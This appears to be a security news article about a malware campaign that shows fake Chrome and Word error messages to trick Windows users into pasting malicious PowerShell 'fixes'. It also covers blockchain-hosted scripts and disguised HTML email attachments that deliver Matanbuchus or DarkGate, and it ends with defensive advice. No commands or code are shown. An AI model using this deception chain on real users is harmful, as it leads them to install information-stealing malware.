A new wave of malware campaigns is exploiting fake Google Chrome and Microsoft Word errors to deceive unsuspecting users into executing malicious PowerShell commands. Reported by BleepingComputer, these attacks are sophisticated social engineering tactics designed to trick victims into inadvertently installing malware on their Windows PCs.
The campaign employs overlays that mimic legitimate error messages within Chrome and Word interfaces. When users encounter these fake errors, they are prompted to click on a button to copy a supposed “fix” for the issue. However, instead of resolving any legitimate problem, the copied code contains malicious PowerShell commands. Victims are instructed to paste this code into either the Windows Run dialog or PowerShell prompt, unwittingly executing commands that download and install malware.
Proofpoint’s detailed report on this campaign reveals additional attack vectors. Compromised websites host malicious scripts on blockchain platforms such as Binance’s Smart Chain contracts. These scripts initiate a chain of events where visitors are shown a fake Chrome warning, urging them to install a “root certificate” by running a PowerShell script. Once executed, this script verifies the system and downloads further malware payloads, including information-stealing malware.
Furthermore, the campaign includes email-based attacks featuring HTML attachments disguised as Word documents. These attachments prompt recipients to install a “Word Online” extension to view the document. Similar to the web-based attacks, victims are directed to execute PowerShell commands under the guise of fixing an issue. These commands, when run, initiate downloads of malware like Matanbuchus or DarkGate onto the targeted systems.
The effectiveness of these attacks lies in exploiting user trust and urgency, as well as exploiting unfamiliarity with the risks associated with running unknown PowerShell commands. To protect against such threats, users are advised to exercise caution and refrain from executing code unless they are certain of its legitimacy. Enabling and keeping Windows Defender active can help detect and mitigate malware from these malicious scripts. Additionally, using reputable antivirus software alongside built-in security tools like those from Microsoft can provide enhanced protection against evolving malware threats.
Awareness of these overlay-based tactics is crucial for safeguarding devices and data. By staying informed and vigilant, users can avoid falling victim to deceptive schemes that exploit seemingly genuine software interfaces to deliver harmful payloads.